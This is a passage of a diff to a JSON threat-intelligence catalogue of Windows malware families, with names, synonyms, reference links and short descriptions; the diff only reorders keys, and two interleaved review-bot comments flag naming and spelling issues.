 "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5",
- "value": "AdvisorsBot",
- "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing."
+ "value": "AdvisorsBot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz",
 "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
- "value": "Adylkuzz",
- "description": ""
+ "value": "Adylkuzz"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "ComRAT",
- "Sun rootkit"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz",
 "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
@@ -2883,16 +2882,19 @@
 "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
 "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
 "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/"
- ]
+ ],
+ "synonyms": [
+ "ComRAT",
+ "Sun rootkit"
+ ],
+ "type": []
 },
 "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
- "value": "Agent.BTZ",
- "description": ""
+ "value": "Agent.BTZ"
 },
 {
+ "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
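Review bot: The entry at `+ "value": "win.adkoob"` keeps the Malpedia slug as its display name, while every neighbouring entry in this hunk uses a human-readable name (`"Acronym"`, `"AdvisorsBot"`, `"Adylkuzz"`). Because `value` is the label MISP displays and matches on, a name consistent with the others — for example `"value": "AdKoob"`, following the `adkoob` slug in the Sophos reference URL — would be clearer; the Malpedia ref in the same entry already preserves the slug for lookup.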
@@ -2902,46 +2904,42 @@ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", - "value": "Agent Tesla", - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." + "value": "Agent Tesla" }, { + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", - "value": "Aldibot", - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." 
+ "value": "Aldibot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
- "value": "Project Alice",
- "description": ""
+ "value": "Project Alice"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "alina_spark",
- "katrina",
- "alina_eagle"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos",
 "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
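Review bot: The Aldibot description re-emitted at `+ "description": "According to Trend Micro Encyclopia:...` misspells the source as `Encyclopia`; the Trend Micro reference in the same entry is the Threat Encyclopedia, so `Encyclopedia` is meant, and since the whole string is rewritten on the new side the correction fits in this change rather than a follow-up. The same string also embeds `\r\n` paragraph breaks, unlike the other multi-sentence descriptions in these hunks (7ev3n, AcridRain, Agent Tesla), which use none; if the rendering layer is not expecting CRLF inside a field, normalising to `\n` or to plain sentences keeps the field consistent across entries.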
@@ -2951,163 +2949,162 @@
 "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
 "https://www.nuix.com/blog/alina-continues-spread-its-wings",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/"
- ]
+ ],
+ "synonyms": [
+ "alina_spark",
+ "katrina",
+ "alina_eagle"
+ ],
+ "type": []
 },
 "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70",
- "value": "Alina POS",
- "description": ""
+ "value": "Alina POS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Starman"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple",
 "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/",
 "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf"
- ]
+ ],
+ "synonyms": [
+ "Starman"
+ ],
+ "type": []
 },
 "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
- "value": "Allaple",
- "description": ""
+ "value": "Allaple"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator",
 "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "a0881a0c-e677-495b-b475-290af09bb716",
- "value": "Alma Communicator",
- "description": ""
+ "value": "Alma Communicator"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b",
- "value": "AlmaLocker",
- "description": ""
+ "value": "AlmaLocker"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe",
 "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
}, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", - "value": "ALPC Local PrivEsc", - "description": "" + "value": "ALPC Local PrivEsc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "" + "value": "Alphabet Ransomware" }, { + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. 
On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. 
On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + "value": "AlphaLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", - "value": "AlphaNC", - "description": "" + "value": "AlphaNC" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "" + "value": "Alreay" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ], "synonyms": [ "Olmarik", "Pihar", "TDSS", "TDL" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" - ] + "type": [] }, "uuid": 
"ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - "description": "" + "value": "Alureon" }, { + "description": "", "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] + ], + "synonyms": [ + "Adupihan" + ], + "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "" + "value": "AMTsol" }, { + "description": "", "meta": { - "synonyms": [ - "Gamarue", - "B106-Gamarue", - "B67-SS-Gamarue", - "b66" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "http://blog.morphisec.com/andromeda-tactics-analyzed", 
@@ -3125,354 +3122,356 @@
 "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
 "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
 "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/"
- ]
+ ],
+ "synonyms": [
+ "Gamarue",
+ "B106-Gamarue",
+ "B67-SS-Gamarue",
+ "b66"
+ ],
+ "type": []
 },
 "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a",
- "value": "Andromeda",
- "description": ""
+ "value": "Andromeda"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7",
- "value": "Anel",
- "description": ""
+ "value": "Anel"
 },
 {
+ "description": "",
 "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam"
+ ],
 "synonyms": [
 "Latinus"
 ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam"
- ]
+ "type": []
 },
 "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694",
- "value": "Antilam",
- "description": ""
+ "value": "Antilam"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto",
 "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d3e16d46-e436-4757-b962-6fd393056415",
- "value": "Apocalipto",
- "description": ""
+ "value": "Apocalipto"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom",
 "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
- "value": "Apocalypse",
- "description": ""
+ "value": "Apocalypse"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5",
- "value": "ArdaMax",
- "description": ""
+ "value": "ArdaMax"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty",
 "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf",
- "value": "Arefty",
- "description": ""
+ "value": "Arefty"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Aaron Keylogger"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger",
 "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/",
 "http://remote-keylogger.net/"
- ]
+ ],
+ "synonyms": [
+ "Aaron Keylogger"
+ ],
+ "type": []
 },
 "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06",
- "value": "Arik Keylogger",
- "description": ""
+ "value": "Arik Keylogger"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader",
 "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/",
 "https://twitter.com/Racco42/status/1001374490339790849",
 "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795",
- "value": "ARS VBS Loader",
- "description": ""
+ "value": "ARS VBS Loader"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13",
- "value": "AscentLoader",
- "description": ""
+ "value": "AscentLoader"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27",
- "value": "ASPC",
- "description": ""
+ "value": "ASPC"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Aseljo",
- "BadSrc"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox",
 "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/",
 "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/"
- ]
+ ],
+ "synonyms": [
+ "Aseljo",
+ "BadSrc"
+ ],
+ "type": []
 },
 "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00",
- "value": "Asprox",
- "description": ""
+ "value": "Asprox"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago",
 "http://blog.talosintel.com/2017/02/athena-go.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2",
- "value": "AthenaGo RAT",
- "description": ""
+ "value": "AthenaGo RAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent",
 "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573",
- "value": "ATI-Agent",
- "description": ""
+ "value": "ATI-Agent"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii",
 "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6",
- "value": "ATMii",
- "description": ""
+ "value": "ATMii"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch",
 "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448",
- "value": "ATMitch",
- "description": ""
+ "value": "ATMitch"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere",
 "https://www.group-ib.com/resources/threat-research/silence.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420",
- "value": "Atmosphere",
- "description": ""
+ "value": "Atmosphere"
 },
 {
+ "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter",
 "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
 "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187",
- "value": "ATMSpitter",
- "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models."
+ "value": "ATMSpitter"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer",
 "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html",
 "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
- "value": "August Stealer",
- "description": ""
+ "value": "August Stealer"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Riodrv"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga",
 "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
+ ],
+ "synonyms": [
+ "Riodrv"
+ ],
+ "type": []
 },
 "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
- "value": "Auriga",
- "description": ""
+ "value": "Auriga"
 },
 {
+ "description": "Ransomware",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora",
 "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d",
- "value": "Aurora",
- "description": "Ransomware"
+ "value": "Aurora"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler",
 "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7",
- "value": "AvastDisabler",
- "description": ""
+ "value": "AvastDisabler"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt",
 "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e",
- "value": "AVCrypt",
- "description": ""
+ "value": "AVCrypt"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo",
 "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95",
- "value": "Aveo",
- "description": ""
+ "value": "Aveo"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan",
 "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3",
- "value": "Avzhan",
- "description": ""
+ "value": "Avzhan"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70",
- "value": "Ayegent",
- "description": ""
+ "value": "Ayegent"
 },
 {
+ "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.",
 "meta": {
- "synonyms": [
- "PuffStealer",
- "Rultazo"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult",
 "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
@@ -3482,18 +3481,19 @@
 "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
 "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
 "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside"
- ]
+ ],
+ "synonyms": [
+ "PuffStealer",
+ "Rultazo"
+ ],
+ "type": []
 },
 "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c",
- "value": "Azorult",
- "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit."
+ "value": "Azorult"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "SNOWBALL"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar",
 "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/",
@@ -3501,84 +3501,86 @@
 "http://www.spiegel.de/media/media-35683.pdf",
 "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/"
- ]
+ ],
+ "synonyms": [
+ "SNOWBALL"
+ ],
+ "type": []
 },
 "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
- "value": "Babar",
- "description": ""
+ "value": "Babar"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal",
 "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467",
- "value": "BABYMETAL",
- "description": ""
+ "value": "BABYMETAL"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "23398248-a52a-4a7c-af10-262822d33a4e",
- "value": "backspace",
- "description": ""
+ "value": "backspace"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap",
 "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/",
 "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
 "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
 "https://www.cert.pl/en/news/single/backswap-malware-analysis/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d",
- "value": "BackSwap",
- "description": ""
